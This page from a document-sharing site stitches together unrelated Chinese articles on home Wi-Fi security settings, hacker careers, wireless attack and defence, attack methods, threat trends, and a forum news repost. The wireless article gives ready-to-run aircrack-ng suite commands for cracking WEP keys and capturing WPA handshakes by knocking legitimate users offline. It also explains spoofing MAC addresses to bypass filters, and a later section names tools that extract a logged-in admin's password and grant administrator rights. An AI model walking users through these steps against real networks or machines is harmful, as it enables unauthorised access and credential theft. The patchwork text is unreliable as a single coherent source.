文档库 最新最全的文档下载
当前位置:文档库 › 无线网络安全设置五种不可不知方法

无线网络安全设置五种不可不知方法

无线网络安全设置五种不可不知方法

谁动了你的无线网络流量?你有没有进行无线网络安全设置,保证你的网络安全呢?网络的安全越来越被人所重视,如果你还不知道怎么进行无线网络安全设置的话,那么就请仔细阅读下文吧,它将会为你详细列出五种方法。

随着科技的发展以及人们生活水平的提高,现代家庭中有两台以上的电脑是很平常的事情。很多家庭都选择无线路由器来分享上网,无线上网使人们摆脱了线的纠缠,让人们在无线世界中自由的网上冲浪。但请注意,这里指的人们不只是你的家人还包括你的邻居甚至是一些陌生人。IEEE 802.11n草案的推出,无线路由的传输速度也有了质的飞跃。但很多用户只关注了传输速度却忽视了无线网络的安全。例如,在家中阳台上可以搜索到七八个无线连接,其中便有连密码都不设的,可以轻松“分享”他的网络带宽。据调查显示,有90%的网络入侵是因为无线路由器没有进行相应的无线网络安全设置而引发的。

无线网络安全设置之一:DHCP功能

DHCP 是 Dynamic HostConfiguration Protocol(动态主机分配协议)缩写,主要功能就是帮助用户随机分配IP地址,省去了用户手动设置IP地址、子网掩码以及其他所需要的TCP/IP 参数的麻烦。这本来是方便用户的功能,但却被很多别有用心的人利用。一般的路由器DHCP功能是默认开启的,这样所有在信号范围内的无线设备都能自动分配到IP地址,这就留下了极大的安全隐患。攻击者可以通过分配的IP地址轻易得到很多你的路由器的相关信息,所以禁用DHCP功能非常必要。

无线网络安全设置之二:加密

现在很多的无线路由器都拥有了无线加密功能,这是无线路由器的重要保护措施,通过对无线电波中的数据加密来保证传输数据信息的安全。一般的无线路由器或AP都具有WEP加密和WPA加密功能,WEP一般包括64位和128位两种加密类型,只要分别输入10个或26个16进制的字符串作为加密密码就可以保护无线网络。WEP协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络,但WEP密钥一般是是保存在Flash中,所以有些黑客可以利用你网络中的漏洞轻松进入你的网络。

WEP加密出现的较早,现在基本上都已升级为WPA加密,WPA是一种基于标准的可互操作的WLAN安全性增强解决方案,可大大增强现有无线局域网系统的数据保护和访问控制水平;WPA加强了生成加密密钥的算法,黑客即便收集到分组信息并对其进行解析,也几乎无法计算出通用密钥。WPA的出现使得网络传输更加的安全可靠。

无线网络安

全设置之三:SSID广播

简单来说,SSID便是你给自己的无线网络所取的名字。在搜索无线网络时,你的网络名字就会显示在搜索结果中。一旦攻击者利用通用的初始化字符串来连接无线网络,极容易入侵到你的无线网络中来,所以笔者强烈建议你关闭SSID广播。

还要注意,由于特定型号的访问点或路由器的缺省SSID在网上很容易就能搜索到,比如“netgear,linksys等”,因此一定要尽快更换掉。对于一般家庭来说选择差别较大的命名即可。

关闭SSID后再搜索无线网络你会发现由于没有进行SSID广播,该无线网络被无线网卡忽略了,尤其是在使用Windows XP管理无线网络时,可以达到“掩人耳目”的目的,使无线网络不被发现。不过关闭SSID会使网络效率稍有降低,但安全性会大大提高,因此关闭SSID广播还是非常值得的。

无线网络安全设置之四:IP过滤和MAC地址列表

由于每个网卡的MAC地址是唯一的,所以可以通过设置MAC地址列表来提高安全性。在启用了IP地址过滤功能后,只有IP地址在MAC列表中的用户才能正常访问无线网络,其它的不在列表中的就自然无法连入网络了。另外需要注意在“过滤规则”中一定要选择“仅允许已设MAC地址列表中已生效的MAC地址访问无线网络”选项,要不无线路由器就会阻止所有用户连入网络。对于家庭用户来说这个方法非常实用,家中有几台电脑就在列表中添加几台即可,这样既可以避免邻居“蹭网”也可以防止攻击者的入侵。

无线网络安全设置之五:主动更新

搜索并安装所使用的无线路由器或无线网卡的最新固件或驱动更新,消除以前存在的漏洞。还有下载安装所使用的操作系统在无线功能上的更新,比如Windows XP SP3或Vista SP1等,这样可以更好的支持无线网络的使用和安全,使自己的设备能够具备最新的各项功能。

无线网络的速度越来越快,无线网络也该越来越安全。其实只要进行上述简单的几个设置就可以把你的安全等级提升不少。无线网络环境不是连接上这么简单,把安全工作做到家才能使使用更安心畅快。

关于如何从菜鸟成为高技术黑客的问题,我想你要首先搞清楚,你是做那种黑客,你要是做国内记者意义中的黑客(大多是网络罪犯的代名词)还是真正意义的黑客(致力于完善和维护系统网络的it人才),若是前者黑客的话,我想你多用一些工具,多搞一些操作,其实很快就可以了,比如:国内的不少所谓的黑客都是这样,连网络的osi七层结构都搞不清楚,还自称黑客的那种,若是后者那么你就要从基础做起,不断学习,并且,我个人认为是

否黑客与名气无关,只要你技术水平高并且为网络发展做出了贡献,你就是合格的黑客,相反以掌握黑客皮毛技巧就去破坏网络是可耻的。从个人经验来看,要成为一名合格的黑客,是需要从细致学习入手的,主意从以下几个方面:
(1)学好英语,最好达到大学cet-4级的水平以上,这样是为了方便你阅读英文资料和从事一定的开发工作。
(2)掌握基础的计算机知识,比如:计算机软硬件原理,操作系统,数据结构,软件工程,数据库系统,算法等。
(3)熟悉常见操作系统的管理和维护,比如:win9x/xp个人系统,winnt/2k/2003服务器系统,linux系统等,深入专业的可学习以下solaris、hp-unix,aix等。
(4)掌握网络原理及管理诊断,比如:网络拓朴、网络协议,交换与路由、网络分析与诊断等。
(5)会几门编程语言,比如:编译型的asm、c、delphi等,脚本类型的perl、asp、php等。
(6)掌握黑客攻击与防御技术,通过自己掌握的知识和技能发现系统和网络存在的问题并且去解决和完善它。
以上是我对黑客的个人看法,我认为不应该着眼与什么名声,更多应该着眼于你掌握了较多的系统和网络技术,并且能够为社会做出自己的贡献,当然,社会也会给你好的回报,但你不能祈求一定能够有多大的回报,这不仅靠努力,而且还要靠机遇,但不努力的话你的机遇就一定少。
关于从事网络安全是否有前途的问题,我是这么认为的,网络安全始终是网络的辅助品,从国内安全投资占网络投资的15%左右来看,它永远不是主流,但它也不可缺少,从事网络安全可以让你比一般行业要好得多,但你祈求象盛大或百度那样发展,这几乎不可能,所以从事网络安全行业要耐得住寂寞,不能认为你技术高就一定回报就大,事实上,一个初中毕业的朋友在网络上开个网店可能比你要赚得多,但总体上看这样的比率还是比较低的,为什么呢?因为你看到的都是成功者,其实有更多的失败者不为你所知而已,最后总结一下,从事网络安全是一个不错的职业,至少要比其他大多职业好不少,但你要付出很多的艰辛,并且不能祈求一下子有多大的成就,若可以接受的话,很高兴你加入网络安全界

无线网络安全知识小议(无线攻防之矛盾)
无线网络, 安全
前言:本来不准备再出什么无线安全方面的贴子,今日上论坛转转,比较冷清,再出一篇小文,希望大家共同进步。本篇文章,只针对入门级朋友,为提高大家安全意识,普及一下知识,高手不看也罢,请不要应用于非法之处。由于时间和版面问题,文中尽量简练,有问题可以留言,讨论。

其实无线网络并不是不

堪一击,布署严密的保护措施,应用最新的加密技术,还是能够充分保护我们的网络免于来自内部与外部的攻击。本文就是对怎样保护无线网络的方法作一些比较基础的介绍,和一些常用的入侵攻击手法。

在一个无任何防护的无线LAN前,要想攻击它的话,并不需要采取什么特别的手段,只要任何一台配置有无线网卡的机器就行了,一个开启了无线网卡的计算机就是一个潜在的入侵者。有时人们无心地打开了他们装有无线装置的计算机,并且恰好位于你的AP覆盖范围之内,他们就可能闯进了你未设防的“领域”了。

下面一些方法可以避免你的网络受到不经意的访问,这些都是一些初级的内容,并不一定能提供避免那些更熟练入侵者的攻击。既便如此,我还是建议您对您的网络用下面一些方法或其组合作一下相关设置。毕竟所谓的高手还是少数。

一、隐藏SSID

守方:

设一个不常用的SSID名字,尽量不要使用如TP-LINK、default、NETCORE、D-LINK、Kingnet等常用名,关闭SSID广播,在自己电脑上手工增加AP的SSID,自己上网不受影响,而其它人就是收到你的AP信号,但由于不知道你的SSID而无法连上网。

加密现象:

有的无线网卡收不到不广播SSID的信号,有的网卡可以收到这样的信号,但名称一栏为空白。

攻方:

首先你要有一个支持的无线网卡,各个软件对网卡要求有点不同。需用下面软件软件之一,KISMET这个软件是linux下用的探测软件,开启软件进行扫描,只要对方有客户端连网就可以显示出SSID。默认的Kismet是运行在“autofit”模式下的,它显示的内容杂乱无章的,我们可以通过排序把AP按任何有意义有顺序来重新排列,按下“s”键 到“Sort”菜单,在这儿可以按下某个字母来对搜寻到的AP进行排序,如“f”键是按AP名字的第一个字母来排序,而“c”键是按AP使用的频道来进行 排序。

同样能实现的软件有AirMagnet。

推荐使用在windows下的软件,airodump。

使用这个软件,需要你的网卡支持,可以在网上搜索你的网卡是否支持,并且要下载专用驱动程序,程序下载地址https://www.wendangku.net/doc/909454747.html,/support/downloads/drivers

打开airodump进行抓包,图片以下->后面参数分别是

->9(相应无线网卡前的序号)

->a(输入o或者a选择网卡模式)

->11(无线信号的频道)

->03(抓包生成文件名,可以随便输入)

->N(是否只检测WEP加密数据包)

回车确定进行抓包

当Packets达到一定数值时会自动显示,图中ESSID就是SSID,手工在电脑上加入SSID后,就可以连上网络。

二、MAC地址过滤

守方:

在AP在预先写入合法的MAC地

址列表,只有当客户机的MAC地址和合法MAC地址表中的地址匹配,AP才允许客户机与之通信, 实现物理地址过滤。

加密现象:

攻方:

对于老练的攻击者来说,这种加密方式还是很容易被从开放的无线电波中截获数据帧,分析出合法用户的MAC地址的,然后通过本机的MAC地址来伪装成合法的用户,接入WLAN中。

方法同隐藏SSID一样,在KISMET中按C键,记下出现的客户端的MAC地址。或者在windows下用airodump抓包,在station一栏下就是合法的客户端MAC地址,上网找个mac地址更改软件,将你的无线网卡MAC伪装和合法的一样,就可以了。

三、禁用DHCP

守方:

DHCP功能可在无线局域网内自动为每台电脑分配IP地址,不需要用户设置IP地址、子网掩码等TCP/IP参数。但启用了DHCP功能,别人就较容易接入你的无线网络。因此,禁用DHCP功能对无线网络而言也不失为一种加密方法。首先将你的AP的IP地址设为一个不常用的地址段,如192.168.88.77,以避免被入侵者猜到,然后在无线路由器的“DHCP服务器”设置项下将DHCP服务器设定为“不启用”即可。

加密现象:

收到信号,无线网络连接不上

由于无法获得IP地址和DNB服务器信息,既使能找到该无线网络信号,仍然不能使用网络。计算机TCP/IP协议设为自动获取IP地址,出现的现象就是,你的连接上将出现一个惊叹号,如果你随便设个IP地址,能连上就是打不开网页,除非碰巧你的地址输入正确了。

攻方:

要想得到正确的路由器IP地址作为网关,如果对方使用的是默认的路由地址,一般为192.168.0.1、192.168.1.1、192.168.2.1或者192.168.10.1,你可以逐一测试,如果不是默认的地址,那么你必须借助于软件抓包分析,WildPackets 产品:AiroPeek 和OmniPeek可以做到这一点。你需要下载软件并进行安装,网上下载的AiroPeek由于是试用版,有内存限制,包抓到几十兆就百分之百了,建议使用OmniPeek,这个软件试用版相对宽松一些。这两个软件都需要专用驱动支持,下载地址:https://www.wendangku.net/doc/909454747.html,/support/downloads/drivers

输入要破解的频道,如果有加密的话要输入密码。点确定抓包。

抓的包达到一定数量即可分析出的IP地址段,自己再分析具体的DNS,然后再在电脑中手工加入DNS,和自己网卡的IP地址。

四、WEP加密

1. 要破解WEP,首先要确认你周围有没有WEP加密的AP,连WEP网络都没有你就不要谈什么破解了,要查找WEP网络可以用netstumbler探查,但这个软件对于所有加密它都显示为WEP,准确率不高,大家要注意一下。

2.下载backtrack2,地址https://www.wendangku.net/doc/909454747.html,/Soft/2007/505.html

可下载最新版。用iso文件刻成光盘。在BIOS中将电脑设为光

驱起动。用刻好的光盘放入光驱中,启动电脑,进入linux画面,用户名root ,密码toor,输入显示命令startx,可以完成系统运行,如果在输入后出现黑屏,重新启动电脑,在输入用户名和密码后,输入xconf,显卡自动配置命令,再输入startx,即可启动系统。

3.确认你的网卡是否被backtrack2所支持。在命令对话框内输入

ifconfig -a

查看自己网卡的型号,接口

4.以下是在软件网页上找到的,已确认可以支持的网卡

-----PCMCIA Cards

1 3COM 3CRWE154G72 v1

2 AirLink101 AWLC4130

3 ASUS WL100G

4 Belkin F5D7010 V1000

5 Belkin F5D7010 V5000

6 Belkin F5D7010 V6000

7 Belkin F5D7011

8 Buffalo WLI-CB-G54HP

9 Cisco AIR-PCM350

10 Cisco Aironet AIR-CB21AG-A-K9

11 Dlink DWL-650+

12 Dlink DWL-G650

13 Dlink DWL-G650M

14 Dlink DWL-G650+

15 D-Link WNA-1330

16 Linksys WPC54G v3

17 NetGear MA401

18 NetGear WPN511

19 NetGear WG511T

20 NetGear WAG511v2

21 NetGear WG511 v1

22 NetGear WPN511GR

23 PROXIM ORiNOCO 802.11b/g Gold (Model: 8470-WD)

24 Senao NL-2511CD PLUS EXT2

25 Senao Sl-2511CD Plus EXT2

26 SMC 2532W-B

27 SMC WCB-G

28 SWEEX LW051 ver:1.0

29 TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G)

30 Ubiquiti SRC

31 Wistron WLAN 802.11a/b/g Cardbus CB9-GP

32 X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG)

33 ZCom XI-325HP+

34 Zyxel ZyAIR G-100 PCMCIA Card (FCC ID:N89-WE601l)

----USB Card

1 ALFA Networks AWUS036H

2 ASUS WL-167G

3 AVM Fritz!Wlan USB V1.1

4 Buffalo Airstation G54 WLI-U2-KG54-AI (2A)

5 Chiefmax

6 D-Link DWL 122 (USB) F/W 3.2.1 H/W A1

7 D-Link DWL G122 (USB) F/W 2.03 B1

8 D-Link WUA-1340

9 Edimax EW-7318USG

10 Linksys WUSB54g v4

11 Linksys WUSB54GC

12 NetGear WG111v2

13 NetGear WG111T

14 Netopia ter/gusb-e

15 SafeCom SWMULZ-5400

16 ZyDAS 1211

5.找到kismet菜单,点击运行,选择临时文件夹,选择网卡接口,如WIFI0,启动KISMET,在窗口中一个个AP全部露出真容,就是选择不广播SSID的,一会儿也显了出来,看看各AP的加密方式,选择WEP加密的,用笔记下来他的名称,mac,按键对窗口进行整理,再按上下键选择将要破解的的AP,按C键,可以查看这个AP的客户端,记下该客户端的MAC。

如果确认有客户端,破解进程很快。下面以atheros网卡为例进行介绍破解过程:

6.打开一个命令窗口,在窗口中输入命令如下

airmon-ng start wifi0 6

注:其中wifi后面为对应要破解的频道

再输入 wlanconfig ath0 destroy

注:其中ath0替换为你的网卡接口

再输入 ifconfig ath1 up

注:其中ath1替换为你的网卡监听接口

再输入 iwconfig ath1 mode monitor channel 6

注:channel 后面跟的是你要破解的频道,ath1替换为你的网卡

的监听接口

7.上面窗口不关闭,另开一个窗口输入命令:

airodump-ng --ivs -w name -c 6 ath1

注:airodump-ng为抓包命令,--ivs 只抓包wep包,光盘驱动,内存有限,用此项节省内存,-w后面跟的是保存文件的名称,实际保存名称会变成name-01.ivs,-c后面跟的是你要破解的频道,ath1为你的网卡监听接口

这时你会发现电脑会打开一个抓包窗口,显示出AP名称,mac地址,如果有客户端将在下面显示出来,在station下面是客户端的mac,这个客户端一定要和你要破解的ap对应,记下他们,这些应和kismet找到的一致.

8.上面窗口不关闭,另开一个窗口输入命令:

aireplay-ng -3 -b ap的mac -h 客户端的mac ath1

这个语句用来抓包,找到合适的包,就开会发攻击包,这时如果攻击成功的话,你会看airodump窗口的date不住增长。

9.在包增加到一万以上,不关闭以上窗口,另开一个aircrack窗口输入命令如下

aircrack-ng -n 64 -b ap的mac name-01.ivs

-n后面64是指破解Wep是64位,如是128位则为-n 128,文件名称可以输入ls命令查看,以实际为准。

好了,数分钟之后,密码就会出现在你面前.

五、WPA/WPA2加密

守方:

在路由器中将加密方式设定为WPA,如果你的路由支持,尽量选用WPA2,密码尽量长一些,可以使用大写、小写和数字混合,不要用单词,生日,电话号码、姓名等作为密码,必要时可以加入一些特殊字符。

攻方:

对于WPA/WPA2(psk/trip)加密方式,水平较高的攻击者还是可以通过一些工具进行破解尝试的,它的破解方式和WEP破解上不同,它是采用软件抓包,提取客户端和AP间的握手过程包,进行字典攻击破解。所以这个破解方式成功与否很大程度上依赖于字典,如果AP加密采用生日、电话号码的弱口令,安全性还是令人担忧的。但密码设置复杂的话,攻击在目前来说,成功的概率很底,哪怕真的是所谓的高手。

破解的方法:可以在windows下进行,也可以在backtrack2 下进行。破解wep有点区别,首先破解WEP加密抓的有效包为ivs包,WPA加密需要抓的是握手包。

破解程序上,它们前面是没有区别的,但是由于WPA要抓握手包

抓包一步改为:

airodump-ng -w name -c 6 ath1

注:airodump-ng为抓包命令,- w后面跟的是保存文件的名称,实际保存名称会变成name-01.cap,-c后面跟的是你要破解的频道,ath1为你的网卡监听接口

发攻击包那一步和WEP破解也是有区别的:

aireplay-ng -0 30 -b ap的mac -h 客户端的mac ath1

如果信号强度够的话,这个命令语句是使合法客户端掉线,然后进行重连,以便于抓包窗口及时抓到握手包。

破解窗口也是有区别的:

首先你要建立字典,打开一个窗口输入:zcat

/pentest/password/dictionaries/wordlist.txt.Z > password.txt

再开一个窗口,输入破解命令:

aircrack-ng -w password.txt name-01.cap

如果发现抓到握手的话,如果密码在字典中经过时间不等的计算就出显示出来,如果最终没有破解出来,那么插入U盘,将name-01.cap拷贝入U盘,由于在backtrack2字典很弱,破解成功概率很低,将其复制后,到Win-XP导入强大的字典下慢慢破。

关于字典:可以下载木头字典进行生成,也可以利用网友已制作好的QQ字典等。

由于wpa/wpa2破解依赖于字典,制作再好的字典也不可能包含所有密码,所以破解成功率并不高,加之家用计算机计算能力所限,所以破解速率也有限,大家就在技术上研究研究吧。

六、:降低发射功率

守方:

每台AP都是以射频方式发射出无线信号,2.4G信号穿透力是很差的,一般家用路由器,室内在100米内,室外在400米以内,对于a频来说信号传输距离更差一些。这样可以避免一些非法入侵者的接入,但信号毕竟还是有传输距离的,在信号覆盖范围内,还有有被接入的可能。为了提高无线安全,减少设备的信号传输覆盖范围,也不失为一种好办法。但是本方法只适用AP和电脑在同一个房间,或者房子本身面积较小的使用者,才不致于影响自己的使用。因为降低信号对使用者自己和入侵者效果是同等的。

方法:1.如果你的AP支持的话,可以在AP中直接将功率调小一些。

2. 将AP速度不要放在自动调整上,而是放在54M上,这样就是入侵者收到信号但是信号强度达到54M速率,他也是连不上的。

加密现象:

对于第一种情况,离AP稍远点距离的计算机收不到无线信号,或者只能收到若有若无的信号。对于第二种情况,收到的信号后,计算机就是不建立连接。

攻方:

机器收到一个若有若无的信号,或者收到一个信号,就是连不上,是很多攻击者经常遇到的一个问题。这样的信号,就是没有使用加密技术,也是无法连网的,如果使用加密的话,由于信号弱,破解难度要大的多,尤其用发攻击包式的破解,会变得比较困难。

下面介绍一下,提高信号接收的两种方法,作为终结篇。

天线篇:

一个好的天线对于爱好者来说是非常重要的,它能大幅度提高无线设备的传输距离,增大无线连网的范围,最好设备两端都加定向增益天线,传输距离才更远一些。国外爱好者使用DIY的天线,用普通路由器已经创出几百公里连网记录。

这里介绍一下无线天线基本知识:

天线按极化方式分为垂直极化和水平极化。注意传输无线信号两端的天线的极化方式一定要一致,如果不一致,传输效率将非常低。

天线的按方向性分为全向天线和定向天线。全向天线适宜接收多个方向信号,而定向天线随着天线增益提高,方向性趋窄。




天线的阻抗:天线和馈线的阻抗一定要匹配。无线网卡和AP的天线一般都为50欧,注意天线和馈线的选择,如果阻抗不匹配,同样增益的天线效率将大打折扣,并对无线设备造成影响。
天线接口方式:最常用的SMA头,还有一部分使用TMC头,购买天线时一定注意天线和AP(网卡)接口方式要配套一致。



天线的增益。最好设备两端都加定向增益天线。在两端设备之间无任何阻挡情况下,增益越大传输距离越远,但是如果之间有障碍的话,无线传输要非常复杂的多。为了提高接收效果大家可以选择适合自己的天线,或购买成品,或自制。
下面介绍一下我自己做的定向天线,使用效果不错,有兴趣的朋友可以DIY一下。
首先说一下这个天线的来历,很多朋友可能做过双菱天线,没做过的朋友可以在网上找到它的做法。这个天线就是由双菱天线变形得到的,经我个人实践的一个东西,因其由两个环形构成,故我将其命名为双环天线。它的制作上比双菱要方便一些,而且不用调整,用自制的圆筒天线和双菱天线进行了比较,增益上双环要比较高一些,我一共试做了几个,效果一致,适宜自制,我在家原先只能收到一个若有若无的信号,用了这个天线后现在可以收到十几个信号,可以正常使用的七八个,目的只做试验研究使用,不作其它非法用途,下面介绍一下做法。

振子制作及馈线

找一段直径为1~1.5mm的铜线,可以从电线中扒出,将其理直。用尖嘴钳或其它工具将其弯成两个周长为12.5cm的圆,记住是周长,不是直径.,尺寸一定要准确,否则效果天壤之别,振子制作形状如下图。



反射锅制作

到日杂用品店买一个近似为圆球面的薄铝锅,直径在30cm左右。为了做的漂亮一些可以将锅的两耳打掉。在锅中心打个8mm左右的小孔,便于固定和穿馈线。动手能力强的朋友可以把馈线输入端直接焊在网卡上,也可买个转接头自己焊接制作,对于没有时间和精力的朋友,可以在淘宝上买现成的带接头的50欧馈线,如果实在买不到50欧的馈线,可以临时找75欧的双屏蔽的馈线,所谓双屏蔽,就是除了外层有个屏蔽网,还有一层铝箔。

将馈源放在铝锅的焦点偏外一点处,记住不是焦点处,经我多次试试,放在锅的外口平面和焦点位置的中间点,信号最强。关于固定方法,各位朋友发挥自己的想像力,尽量做的漂亮一点就可以了,希望大家能从我的实物图片,得到一些启示和帮助。




安装后

中继

篇:

支持DD-WRT固件的无线路由器

Allnet:All0277

Askey:RT210W

Asus:

Asus WL-500G deluxe

Asus WL-500G premium

Asus WL-300G

Belkin:

F5D7130/7330 (2mb flash)

F5D7230-4 v1000, v1010, v1111

F5D7230-4 v1444 (2mb flash)

Buffalo:

WHR-G54S

WHR-HP-G54

WHR-HP-G54S

WZR-RS-G54

WBR-G54

WBR2-G54

WBR2-G54s

WLA-G54

Linksys:

WRT54G v1.0, v1.1, v2.0, v2.2, v3.0, v3.1, v4.0, v5.0 (2mb flash)

WRT54GL v1.0, v1.1

WRT54GS v1.0, v1.1, v2.0, v2.1, v3.0, v4.0, v5.0 (2mb flash)

WRTSL54GS v1.0

Motorola :

WR850G

Ravo:

W54-RT

Siemens:

Gigaset SE505教你设置dd-wrt 中继上网,先把网卡连上路由,打开ie输入 192.168.1.1

点击setup。输入用户名:root 密码:admin

把Local IP Address 改成与要连上去的那个ip不同的ip段,例如192.168.8.1

然后按下apply应用

重新打开ie输入刚才设定那个ip地址,我设置的是192.168.10.1就输入192.168.8.1

点击status==>输入用户名和密码==>点击wireless,再次输入用户名、密码

点击Site Survey 刷新几次然后join你要加入的那个ssid,其中yes的为未加密信号



按continue这时画面会自动跳转到别外一个页面,把client(客户端)改为repeater(中继),再按save(备注:如果选client需要用网线把机子和路由相连,这样dd-wrt就能当无线网卡用了)

加入虚拟AP

图下面的dd-wrt_vap就是你的ssid名称(最好改成dd-wrt,不改的话应用后无线连接要重新连一下),按下apply就可以了。最后一步就是到setup ==〉basic setup把gate way 和lacal dns 的ip都改为你连上那个ap的ip地址。(我这里的ip是192.168.1.1)

中继加密信号方法:上面加密框填的是对方AP密码,下面框填的是你的虚拟AP加密参数。

下面是中继没有广播SSID信号的方法,手工设定。

目前网络网络中最常用的攻击手段主要有以下几种:
社会工程学攻击
物理攻击
暴力攻击
利用Unicode漏洞攻击
利用缓冲区溢出漏洞进行攻击等技术。
在今天这篇文章中我将结合实际,介绍一些常用的的攻击工具的使用以及部分工具的代码实现。希望大家在以后的工作和学习中继续支持51cto支持本人。
下面首先给大家介绍一下社会工程学攻击, 社会工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。
举个例子:一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和他们的配偶、孩子

的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。
一、社会工程学攻击
目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造E-mail
1、打电话请求密码
尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。
2、伪造E-mail
使用telnet一个黑客可以截取任何一个身份证发送E-mail的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。
二、物理攻击之获取管理员密码
物理安全是保护一些比较重要的设备不被接触。物理安全比较难防,因为攻击者往往是来自能够接触到物理设备的用户。下面一案例来说明如何获得用户的管理员帐号。
如果你的电脑经常被别人接触,别人就有可能利用一些工具软件来获得你的管理员帐号,这样一来下次他就可以成功的登录你的计算机了。
一般来说我们自己使用的计算机的时候我们都是采用管理员登录的,而管理员帐号在登录后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,物理攻击者就可以利用程序将当前登录用户的密码解码出来
在这种情况下,如果你的计算机给别人使用的话,你虽然不安告诉别人你的计算机密码是多少,别人仍然可以使用软件解码出你的管理员的帐号和密码。比如说使用FindPass.exe如果是windows server 2003环境的话,还可以使用FindPass2003.exe等工具就可以对该进程进行解码,然后将当前用户的密码显示出来。具体使用的方法就是将FindPass.exe或者FindPass2003.exe拷贝到C盘根目录,在cmd下执行该程序,就可以获得当前用户得登录名
所以在此告诫大家如果你的计算机中有非常重要的信息的话也不要轻易给别人使用,这也是很危险的。
FindPass2003.exe
三、物理攻击之提升用户权限
有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。其实不然,用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。例如利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,这样一来程序就会自动读取所有用户列表,

在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名
输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口

六大网络安全威胁发展趋势

网络安全的的发展趋势在时刻发生着变化,黑客在暗地里正对网络攻击蠢蠢欲动,下面就让我们看看以下六个网络安全威胁的发展趋势。

1.对Web2.0的攻击开始肆虐

在这个Web2.0时代,难道Web2.0还能够躲过黑客的毒爪吗?答案显然是否定的,越来越丰富的Web2.0应用一方面在丰富我们的互联网生活,另一方面,也在丰富黑客的攻击生活。

2.针对性攻击渐露峥嵘

漫无目的的嗅探、扫描的时代已经过去了,黑客的攻击越来越有针对性,毕竟,对于他们而言,针对性的攻击能让他们的工作效率大大提供,带来的结果就是——黑客的收入增加了,我们的的损失也增加了。

3.Adobe有可能成为漏洞的主角

去年底,Windows 7 64bit版本正式发布,此前的很多杯具让微软积极的向Linux学习,现在,通过寻找Windows操作系统的漏洞来进行黑客活动已经没有原来那么容易了,第三方软件自然而然的就成为黑客的攻击对象,市场占用率比Windows还要高的Adobe软件成为了黑客手中的香饽饽。Flash的每次倒下都波及了很多无辜的群众,在可以预见的未来内,相信它还会再次,甚至多次倒下。

4.银行木马的数量和质量都没有下降的可能性

当代的黑客,攻击的目标非常明确的是以经济犯罪为目的,银行是实现他们这一犯罪过程最直接也是最有效的途径。没有一名抱着这种理想的黑客会忽视网络银行用户,对于越来越多的网银用户而言,在未来,要更加在意我们的账号安全,杀毒软件、防火墙、主动防御、身份认证……一个都不能少,也许对于我们而言,这也是一个很不错的学习安全知识的机会。

5.僵尸网络越发猖獗

成功的黑客并不一定需要大量的僵尸网络(请参考百度被黑事件),但是,如果黑客手中拥有庞大的僵尸网络,无疑会让他们的攻击行为和藏匿行为变得更加容易。为了使我们的电脑不沦为肉鸡,与黑客的斗争还会长期持久的进行下去。

6.网络犯罪仍然是黑客主流

我们不止一次的提到过,对于现在的黑客而言,在目前的司法环境下,炫耀技术似乎是一种很愚蠢的行为,通过黑客技术来得到他们银行账户上数字的增加才是他们的最终目的。相信在未来,会有更多的黑客将投入到网络犯罪的产业中。现在的网络犯罪已经形成了完善的黑色产业链,这个产业链我们看到的都是他不断膨胀的趋势。

总 结

我们可以很容易的看到,安全威胁在

我们的身边无处不在,无时不在,甚至越来越多。面对这样的威胁,无视和过于紧张都不是我们应该持有的态度,严密的保护个人和企业的安全,学习安全技术或者求助于身边的安全专家都是处理这些威胁的正确方法。

网络安全问题,应该像每家每户的防火防盗问题一样,做到防范于未然。甚至不会想到你自己也会成为目标的时候,威胁就已经出现了,一旦发生,常常措手不及,造成极大的损失。

黑客攻击严重危害网络安全 中国成受害者之一 [复制链接]


suiyajie suiyajie 当前离线 注册时间2011-7-22最后登录2011-12-1阅读权限200积分12152精华2帖子762. 窥视卡 雷达卡

管理员





串个门加好友打招呼发消息.我玩的应用:



电梯直达 楼主
发表于 2011-8-24 22:59:49 |只看该作者 |倒序浏览 通信世界网(CWW)消息 在2011中国互联网大会上,相关与会嘉宾表示,目前社交网站用户规模达到2.30亿,微博客用户规模达到1.95亿。互联网已经成为国家重要的基础设施,网上信息是国家的重要战略资源,与人民群众生活密切相关,切实维护我们的网络信息安全是保障国家安全和国民经济发展、维护社会稳定的根本要求。
“维护网络安全是世界社会共同的责任,我们既要维护好网上运营安全也要维护好网上信息安全。进一步加强网站信息安全工作自觉遵守法律法规政策,自觉接受政府部门监督指导和监管,加强企业自律规范经营,确保网上信息真实准确,要广泛开展网上安全效益,提高公众安全效益,形成全社会共同维护网络安全的良好风尚。”
该嘉宾还指出,黑客攻击已经严重危害了网络安全,中国是世界上黑客攻击的主要受害者之一。
据中国国家互联网应急中心提供的数据表明,2010年,中国有450多万台主机遭来自境外IP地址的木马控制,比2009年增加了1620%。境外约有22万个IP地址操纵木马病毒,较2009年增长34.1%。
同时,该嘉宾表示,我们互联网一定程度还处于粗放式发展阶段,网络应用发展不均衡、结构不合理,商务和生活应用相对滞后等矛盾相对突出,与持续协调科持续发展还存在不少差距。



分享到: QQ空间 腾讯微博 腾讯朋友 .
分享0 收藏0 .
新注册用户发帖审核制度开启
使用道具 举报
提升卡置顶卡沉默卡喧嚣卡变色卡抢沙发千斤顶照妖镜.


